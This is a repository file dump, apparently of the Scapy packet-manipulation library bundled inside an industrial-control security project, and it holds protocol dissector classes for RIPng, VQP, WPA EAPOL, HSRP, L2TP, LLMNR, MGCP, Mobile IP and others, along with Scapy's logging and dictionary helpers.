| return tout 60 | 61 | _PPIDot11CommonChFlags = ['','','','','Turbo','CCK','OFDM','2GHz','5GHz', 62 | 'PassiveOnly','Dynamic CCK-OFDM','GSFK'] 63 | 64 | _PPIDot11CommonPktFlags = ['FCS','TSFT_ms','FCS_Invalid','PHY_Error'] 65 | 66 | # PPI 802.11 Common Field Header 67 | class Dot11Common(Packet): 68 | name = "PPI 802.11-Common" 69 | fields_desc = [ LEShortField('pfh_type',PPI_DOT11COMMON), 70 | LEShortField('pfh_length', 20), 71 | PPITSFTField('TSF_Timer', 0), 72 | FlagsField('Pkt_Flags',0, -16, _PPIDot11CommonPktFlags), 73 | LEShortField('Rate',0), 74 | LEShortField('Ch_Freq',0), 75 | FlagsField('Ch_Flags', 0, -16, _PPIDot11CommonChFlags), 76 | ByteField('FHSS_Hop',0), 77 | ByteField('FHSS_Pat',0), 78 | dBmByteField('Antsignal',-128), 79 | dBmByteField('Antnoise',-128)] 80 | 81 | def extract_padding(self, p): 82 | return "",p 83 | #Hopefully other CACE defined types will be added here. 84 | 85 | #Add the dot11common layer to the PPI array 86 | addPPIType(PPI_DOT11COMMON, Dot11Common) 87 | 88 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/ripng.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # http://trac.secdev.org/scapy/ticket/301 4 | 5 | # scapy.contrib.description = RIPng 6 | # scapy.contrib.status = loads 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.inet import UDP 11 | from scapy.layers.inet6 import * 12 | 13 | class RIPng(Packet): 14 | name = "RIPng header" 15 | fields_desc = [ 16 | ByteEnumField("cmd", 1, {1 : "req", 2 : "resp"}), 17 | ByteField("ver", 1), 18 | ShortField("null", 0), 19 | ] 20 | 21 | class RIPngEntry(Packet): 22 | name = "RIPng entry" 23 | fields_desc = [ 24 | ConditionalField(IP6Field("prefix", "::"), 25 | lambda pkt: pkt.metric != 255), 26 | ConditionalField(IP6Field("nexthop", "::"), 27 | lambda pkt: pkt.metric == 255), 28 | ShortField("routetag", 0), 29 | ByteField("prefixlen", 0), 30 | ByteEnumField("metric", 1, {16 : "Unreach", 31 | 255 : "next-hop entry"}) 32 | ] 33 | 34 | bind_layers(UDP, RIPng, sport=521, dport=521) 35 | bind_layers(RIPng, RIPngEntry) 36 | bind_layers(RIPngEntry, RIPngEntry) 37 | 38 | if __name__ == "__main__": 39 | from scapy.main import interact 40 | interact(mydict=globals(), mybanner="RIPng") 41 | 42 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/vqp.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/147 3 | 4 | # scapy.contrib.description = VLAN Query Protocol 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.inet import UDP 10 | 11 | class VQP(Packet): 12 | name = "VQP" 13 | fields_desc = [ 14 | ByteField("const", 1), 15 | ByteEnumField("type", 1, { 16 | 1:"requestPort", 2:"responseVLAN", 17 | 3:"requestReconfirm", 4:"responseReconfirm" 18 | }), 19 | ByteEnumField("errorcodeaction", 0, { 20 | 0:"none",3:"accessDenied", 21 | 4:"shutdownPort", 5:"wrongDomain" 22 | }), 23 | ByteEnumField("unknown", 2, { 24 | 2:"inGoodResponse", 6:"inRequests" 25 | }), 26 | IntField("seq",0), 27 | ] 28 | 29 | class VQPEntry(Packet): 30 | name = "VQPEntry" 31 | fields_desc = [ 32 | IntEnumField("datatype", 0, { 33 | 3073:"clientIPAddress", 3074:"portName", 34 | 3075:"VLANName", 3076:"Domain", 3077:"ethernetPacket", 35 | 3078:"ReqMACAddress", 3079:"unknown", 36 | 3080:"ResMACAddress" 37 | }), 38 | FieldLenField("len", None), 39 | ConditionalField(IPField("datatom", "0.0.0.0"), 40 | lambda p:p.datatype==3073), 41 | ConditionalField(MACField("data", "00:00:00:00:00:00"), 42 | lambda p:p.datatype==3078), 43 | ConditionalField(MACField("data", "00:00:00:00:00:00"), 44 | lambda p:p.datatype==3080), 45 | ConditionalField(StrLenField("data", None, 46 | length_from=lambda p:p.len), 47 | lambda p:p.datatype not in [3073, 3078, 3080]), 48 | ] 49 | def post_build(self, p, pay): 50 | if self.len is None: 51 | l = len(p.data) 52 | p = p[:2]+struct.pack("!H",l)+p[4:] 53 | return p 54 | 55 | bind_layers(UDP, VQP, sport=1589) 56 | bind_layers(UDP, VQP, dport=1589) 57 | bind_layers(VQP, VQPEntry, ) 58 | bind_layers(VQPEntry, VQPEntry, ) 59 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/contrib/wpa_eapol.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/104 3 | 4 | # scapy.contrib.description = WPA EAPOL dissector 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.l2 import * 10 | 11 | class WPA_key(Packet): 12 | name = "WPA_key" 13 | fields_desc = [ ByteField("descriptor_type", 1), 14 | ShortField("key_info",0), 15 | LenField("len", None, "H"), 16 | StrFixedLenField("replay_counter", "", 8), 17 | StrFixedLenField("nonce", "", 32), 18 | StrFixedLenField("key_iv", "", 16), 19 | StrFixedLenField("wpa_key_rsc", "", 8), 20 | StrFixedLenField("wpa_key_id", "", 8), 21 | StrFixedLenField("wpa_key_mic", "", 16), 22 | LenField("wpa_key_length", None, "H"), 23 | StrLenField("wpa_key", "", length_from=lambda pkt:pkt.wpa_key_length) ] 24 | def extract_padding(self, s): 25 | l = self.len 26 | return s[:l],s[l:] 27 | def hashret(self): 28 | return chr(self.type)+self.payload.hashret() 29 | def answers(self, other): 30 | if isinstance(other,WPA_key): 31 | return 1 32 | return 0 33 | 34 | 35 | bind_layers( EAPOL, WPA_key, type=3) 36 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/crypto/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Arnaud Ebalard 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Tools for handling with digital certificates. 8 | """ 9 | 10 | try: 11 | import Crypto 12 | except ImportError: 13 | import logging 14 | log_loading = logging.getLogger("scapy.loading") 15 | log_loading.info("Can't import python Crypto lib. Disabled certificate manipulation tools") 16 | else: 17 | from scapy.crypto.cert import * 18 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/crypto/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/crypto/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/dadict.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Direct Access dictionary. 8 | """ 9 | 10 | from error import Scapy_Exception 11 | 12 | ############################### 13 | ## Direct Access dictionnary ## 14 | ############################### 15 | 16 | def fixname(x): 17 | if x and x[0] in "0123456789": 18 | x = "n_"+x 19 | return x.translate("________________________________________________0123456789_______ABCDEFGHIJKLMNOPQRSTUVWXYZ______abcdefghijklmnopqrstuvwxyz_____________________________________________________________________________________________________________________________________") 20 | 21 | 22 | class DADict_Exception(Scapy_Exception): 23 | pass 24 | 25 | class DADict: 26 | def __init__(self, _name="DADict", **kargs): 27 | self._name=_name 28 | self.__dict__.update(kargs) 29 | def fixname(self,val): 30 | return fixname(val) 31 | def __contains__(self, val): 32 | return val in self.__dict__ 33 | def __getitem__(self, attr): 34 | return getattr(self, attr) 35 | def __setitem__(self, attr, val): 36 | return setattr(self, self.fixname(attr), val) 37 | def __iter__(self): 38 | return iter(map(lambda (x,y):y,filter(lambda (x,y):x and x[0]!="_", self.__dict__.items()))) 39 | def _show(self): 40 | for k in self.__dict__.keys(): 41 | if k and k[0] != "_": 42 | print "%10s = %r" % (k,getattr(self,k)) 43 | def __repr__(self): 44 | return "<%s/ %s>" % (self._name," ".join(filter(lambda x:x and x[0]!="_",self.__dict__.keys()))) 45 | 46 | def _branch(self, br, uniq=0): 47 | if uniq and br._name in self: 48 | raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name)) 49 | self[br._name] = br 50 | 51 | def _my_find(self, *args, **kargs): 52 | if args and self._name not in args: 53 | return False 54 | for k in kargs: 55 | if k not in self or self[k] != kargs[k]: 56 | return False 57 | return True 58 | 59 | def _find(self, *args, **kargs): 60 | return self._recurs_find((), *args, **kargs) 61 | def _recurs_find(self, path, *args, **kargs): 62 | if self in path: 63 | return None 64 | if self._my_find(*args, **kargs): 65 | return self 66 | for o in self: 67 | if isinstance(o, DADict): 68 | p = o._recurs_find(path+(self,), *args, **kargs) 69 | if p is not None: 70 | return p 71 | return None 72 | def _find_all(self, *args, **kargs): 73 | return self._recurs_find_all((), *args, **kargs) 74 | def _recurs_find_all(self, path, *args, **kargs): 75 | r = [] 76 | if self in path: 77 | return r 78 | if self._my_find(*args, **kargs): 79 | r.append(self) 80 | for o in self: 81 | if isinstance(o, DADict): 82 | p = o._recurs_find_all(path+(self,), *args, **kargs) 83 | r += p 84 | return r 85 | def keys(self): 86 | return filter(lambda x:x and x[0]!="_", self.__dict__.keys()) 87 | 88 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/dadict.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/dadict.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/data.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/data.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/error.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Logging subsystem and basic exception class. 8 | """ 9 | 10 | ############################# 11 | ##### Logging subsystem ##### 12 | ############################# 13 | 14 | class Scapy_Exception(Exception): 15 | pass 16 | 17 | import logging,traceback,time 18 | 19 | class ScapyFreqFilter(logging.Filter): 20 | def __init__(self): 21 | logging.Filter.__init__(self) 22 | self.warning_table = {} 23 | def filter(self, record): 24 | from config import conf 25 | wt = conf.warning_threshold 26 | if wt > 0: 27 | stk = traceback.extract_stack() 28 | caller=None 29 | for f,l,n,c in stk: 30 | if n == 'warning': 31 | break 32 | caller = l 33 | tm,nb = self.warning_table.get(caller, (0,0)) 34 | ltm = time.time() 35 | if ltm-tm > wt: 36 | tm = ltm 37 | nb = 0 38 | else: 39 | if nb < 2: 40 | nb += 1 41 | if nb == 2: 42 | record.msg = "more "+record.msg 43 | else: 44 | return 0 45 | self.warning_table[caller] = (tm,nb) 46 | return 1 47 | 48 | log_scapy = logging.getLogger("scapy") 49 | console_handler = logging.StreamHandler() 50 | console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s")) 51 | log_scapy.addHandler(console_handler) 52 | log_runtime = logging.getLogger("scapy.runtime") # logs at runtime 53 | log_runtime.addFilter(ScapyFreqFilter()) 54 | log_interactive = logging.getLogger("scapy.interactive") # logs in interactive functions 55 | log_loading = logging.getLogger("scapy.loading") # logs when loading scapy 56 | 57 | 58 | def warning(x): 59 | log_runtime.warning(x) 60 | 61 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/error.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/error.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/fields.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/fields.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Layer package. 8 | """ 9 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/__init__.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | All layers. Configurable with conf.load_layers. 8 | """ 9 | 10 | from scapy.config import conf 11 | from scapy.error import log_loading 12 | import logging 13 | log = logging.getLogger("scapy.loading") 14 | 15 | def _import_star(m): 16 | mod = __import__(m, globals(), locals()) 17 | for k,v in mod.__dict__.iteritems(): 18 | globals()[k] = v 19 | 20 | for _l in conf.load_layers: 21 | log_loading.debug("Loading layer %s" % _l) 22 | try: 23 | _import_star(_l) 24 | except Exception,e: 25 | log.warning("can't import layer %s: %s" % (_l,e)) 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/all.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/all.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/bluetooth.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/bluetooth.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/dhcp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/dhcp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/dhcp6.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/dhcp6.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/dns.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/dns.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/dot11.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/dot11.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/gprs.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | GPRS (General Packet Radio Service) for mobile data communication. 8 | """ 9 | 10 | from scapy.fields import * 11 | from scapy.packet import * 12 | from scapy.layers.inet import IP 13 | 14 | class GPRS(Packet): 15 | name = "GPRSdummy" 16 | fields_desc = [ 17 | StrStopField("dummy","","\x65\x00\x00",1) 18 | ] 19 | 20 | 21 | bind_layers( GPRS, IP, ) 22 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/gprs.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/gprs.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/hsrp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | ############################################################################# 7 | ## ## 8 | ## hsrp.py --- HSRP protocol support for Scapy ## 9 | ## ## 10 | ## Copyright (C) 2010 Mathieu RENARD mathieu.renard(at)gmail.com ## 11 | ## ## 12 | ## This program is free software; you can redistribute it and/or modify it ## 13 | ## under the terms of the GNU General Public License version 2 as ## 14 | ## published by the Free Software Foundation; version 2. ## 15 | ## ## 16 | ## This program is distributed in the hope that it will be useful, but ## 17 | ## WITHOUT ANY WARRANTY; without even the implied warranty of ## 18 | ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## 19 | ## General Public License for more details. ## 20 | ## ## 21 | ############################################################################# 22 | ## HSRP Version 1 23 | ## Ref. RFC 2281 24 | ## HSRP Version 2 25 | ## Ref. http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html 26 | ## 27 | ## $Log: hsrp.py,v $ 28 | ## Revision 0.2 2011/05/01 15:23:34 mrenard 29 | ## Cleanup code 30 | 31 | """ 32 | HSRP (Hot Standby Router Protocol): proprietary redundancy protocol for Cisco routers. 33 | """ 34 | 35 | from scapy.fields import * 36 | from scapy.packet import * 37 | from scapy.layers.inet import UDP 38 | 39 | 40 | class HSRP(Packet): 41 | name = "HSRP" 42 | fields_desc = [ 43 | ByteField("version", 0), 44 | ByteEnumField("opcode", 0, {0: "Hello", 1: "Coup", 2: "Resign", 3: "Advertise"}), 45 | ByteEnumField("state", 16, {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}), 46 | ByteField("hellotime", 3), 47 | ByteField("holdtime", 10), 48 | ByteField("priority", 120), 49 | ByteField("group", 1), 50 | ByteField("reserved", 0), 51 | StrFixedLenField("auth", "cisco" + "\00" * 3, 8), 52 | IPField("virtualIP", "192.168.1.1")] 53 | 54 | def guess_payload_class(self, payload): 55 | if self.underlayer.len > 28: 56 | return HSRPmd5 57 | else: 58 | return Packet.guess_payload_class(self, payload) 59 | 60 | 61 | class HSRPmd5(Packet): 62 | name = "HSRP MD5 Authentication" 63 | fields_desc = [ 64 | ByteEnumField("type", 4, {4: "MD5 authentication"}), 65 | ByteField("len", None), 66 | ByteEnumField("algo", 0, {1: "MD5"}), 67 | ByteField("padding", 0x00), 68 | XShortField("flags", 0x00), 69 | IPField("sourceip", None), 70 | XIntField("keyid", 0x00), 71 | StrFixedLenField("authdigest", "\00" * 16, 16)] 72 | 73 | def post_build(self, p, pay): 74 | if self.len is None and pay: 75 | l = len(pay) 76 | p = p[:1] + hex(l)[30:] + p[30:] 77 | return p 78 | 79 | bind_layers(UDP, HSRP, dport=1985, sport=1985) 80 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/hsrp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/hsrp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/inet.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/inet.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/inet6.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/inet6.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/ir.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | IrDA infrared data communication. 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.l2 import CookedLinux 13 | 14 | 15 | 16 | # IR 17 | 18 | class IrLAPHead(Packet): 19 | name = "IrDA Link Access Protocol Header" 20 | fields_desc = [ XBitField("Address", 0x7f, 7), 21 | BitEnumField("Type", 1, 1, {"Response":0, 22 | "Command":1})] 23 | 24 | class IrLAPCommand(Packet): 25 | name = "IrDA Link Access Protocol Command" 26 | fields_desc = [ XByteField("Control", 0), 27 | XByteField("Format identifier", 0), 28 | XIntField("Source address", 0), 29 | XIntField("Destination address", 0xffffffffL), 30 | XByteField("Discovery flags", 0x1), 31 | ByteEnumField("Slot number", 255, {"final":255}), 32 | XByteField("Version", 0)] 33 | 34 | 35 | class IrLMP(Packet): 36 | name = "IrDA Link Management Protocol" 37 | fields_desc = [ XShortField("Service hints", 0), 38 | XByteField("Character set", 0), 39 | StrField("Device name", "") ] 40 | 41 | 42 | bind_layers( CookedLinux, IrLAPHead, proto=23) 43 | bind_layers( IrLAPHead, IrLAPCommand, Type=1) 44 | bind_layers( IrLAPCommand, IrLMP, ) 45 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/ir.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/ir.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/isakmp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/isakmp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/l2.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/l2.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/l2tp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | L2TP (Layer 2 Tunneling Protocol) for VPNs. 8 | 9 | [RFC 2661] 10 | """ 11 | 12 | import struct 13 | 14 | from scapy.packet import * 15 | from scapy.fields import * 16 | from scapy.layers.inet import UDP 17 | from scapy.layers.ppp import PPP 18 | 19 | class L2TP(Packet): 20 | fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}), 21 | ShortField("len", None), 22 | ShortField("tunnel_id", 0), 23 | ShortField("session_id", 0), 24 | ShortField("ns", 0), 25 | ShortField("nr", 0), 26 | ShortField("offset", 0) ] 27 | 28 | def post_build(self, pkt, pay): 29 | if self.len is None: 30 | l = len(pkt)+len(pay) 31 | pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:] 32 | return pkt+pay 33 | 34 | 35 | bind_layers( UDP, L2TP, sport=1701, dport=1701) 36 | bind_layers( L2TP, PPP, ) 37 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/l2tp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/l2tp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/llmnr.py: -------------------------------------------------------------------------------- 1 | from scapy.fields import * 2 | from scapy.packet import * 3 | from scapy.layers.inet import UDP 4 | from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField 5 | 6 | """ 7 | LLMNR (Link Local Multicast Node Resolution). 8 | 9 | [RFC 4795] 10 | """ 11 | 12 | ############################################################################# 13 | ### LLMNR (RFC4795) ### 14 | ############################################################################# 15 | # LLMNR is based on the DNS packet format (RFC1035 Section 4) 16 | # RFC also envisions LLMNR over TCP. Like vista, we don't support it -- arno 17 | 18 | _LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3" 19 | _LLMNR_IPv4_mcast_addr = "224.0.0.252" 20 | 21 | class LLMNRQuery(Packet): 22 | name = "Link Local Multicast Node Resolution - Query" 23 | fields_desc = [ ShortField("id", 0), 24 | BitField("qr", 0, 1), 25 | BitEnumField("opcode", 0, 4, { 0:"QUERY" }), 26 | BitField("c", 0, 1), 27 | BitField("tc", 0, 2), 28 | BitField("z", 0, 4), 29 | BitEnumField("rcode", 0, 4, { 0:"ok" }), 30 | DNSRRCountField("qdcount", None, "qd"), 31 | DNSRRCountField("ancount", None, "an"), 32 | DNSRRCountField("nscount", None, "ns"), 33 | DNSRRCountField("arcount", None, "ar"), 34 | DNSQRField("qd", "qdcount"), 35 | DNSRRField("an", "ancount"), 36 | DNSRRField("ns", "nscount"), 37 | DNSRRField("ar", "arcount",0)] 38 | overload_fields = {UDP: {"sport": 5355, "dport": 5355 }} 39 | def hashret(self): 40 | return struct.pack("!H", self.id) 41 | 42 | class LLMNRResponse(LLMNRQuery): 43 | name = "Link Local Multicast Node Resolution - Response" 44 | qr = 1 45 | def answers(self, other): 46 | return (isinstance(other, LLMNRQuery) and 47 | self.id == other.id and 48 | self.qr == 1 and 49 | other.qr == 0) 50 | 51 | def _llmnr_dispatcher(x, *args, **kargs): 52 | cls = conf.raw_layer 53 | if len(x) >= 3: 54 | if (ord(x[4]) & 0x80): # Response 55 | cls = LLMNRResponse 56 | else: # Query 57 | cls = LLMNRQuery 58 | return cls(x, *args, **kargs) 59 | 60 | bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 }) 61 | bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 }) 62 | 63 | # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista."))) 64 | 65 | 66 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/llmnr.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/llmnr.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/mgcp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | MGCP (Media Gateway Control Protocol) 8 | 9 | [RFC 2805] 10 | """ 11 | 12 | from scapy.packet import * 13 | from scapy.fields import * 14 | from scapy.layers.inet import UDP 15 | 16 | class MGCP(Packet): 17 | name = "MGCP" 18 | longname = "Media Gateway Control Protocol" 19 | fields_desc = [ StrStopField("verb","AUEP"," ", -1), 20 | StrFixedLenField("sep1"," ",1), 21 | StrStopField("transaction_id","1234567"," ", -1), 22 | StrFixedLenField("sep2"," ",1), 23 | StrStopField("endpoint","dummy@dummy.net"," ", -1), 24 | StrFixedLenField("sep3"," ",1), 25 | StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1), 26 | StrFixedLenField("sep4","\x0a",1), 27 | ] 28 | 29 | 30 | #class MGCP(Packet): 31 | # name = "MGCP" 32 | # longname = "Media Gateway Control Protocol" 33 | # fields_desc = [ ByteEnumField("type",0, ["request","response","others"]), 34 | # ByteField("code0",0), 35 | # ByteField("code1",0), 36 | # ByteField("code2",0), 37 | # ByteField("code3",0), 38 | # ByteField("code4",0), 39 | # IntField("trasid",0), 40 | # IntField("req_time",0), 41 | # ByteField("is_duplicate",0), 42 | # ByteField("req_available",0) ] 43 | # 44 | bind_layers( UDP, MGCP, dport=2727) 45 | bind_layers( UDP, MGCP, sport=2727) 46 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/mgcp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/mgcp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/mobileip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Mobile IP. 8 | """ 9 | 10 | from scapy.fields import * 11 | from scapy.packet import * 12 | from scapy.layers.inet import IP,UDP 13 | 14 | 15 | class MobileIP(Packet): 16 | name = "Mobile IP (RFC3344)" 17 | fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ] 18 | 19 | class MobileIPRRQ(Packet): 20 | name = "Mobile IP Registration Request (RFC3344)" 21 | fields_desc = [ XByteField("flags", 0), 22 | ShortField("lifetime", 180), 23 | IPField("homeaddr", "0.0.0.0"), 24 | IPField("haaddr", "0.0.0.0"), 25 | IPField("coaddr", "0.0.0.0"), 26 | LongField("id", 0), ] 27 | 28 | class MobileIPRRP(Packet): 29 | name = "Mobile IP Registration Reply (RFC3344)" 30 | fields_desc = [ ByteField("code", 0), 31 | ShortField("lifetime", 180), 32 | IPField("homeaddr", "0.0.0.0"), 33 | IPField("haaddr", "0.0.0.0"), 34 | LongField("id", 0), ] 35 | 36 | class MobileIPTunnelData(Packet): 37 | name = "Mobile IP Tunnel Data Message (RFC3519)" 38 | fields_desc = [ ByteField("nexthdr", 4), 39 | ShortField("res", 0) ] 40 | 41 | 42 | bind_layers( UDP, MobileIP, sport=434) 43 | 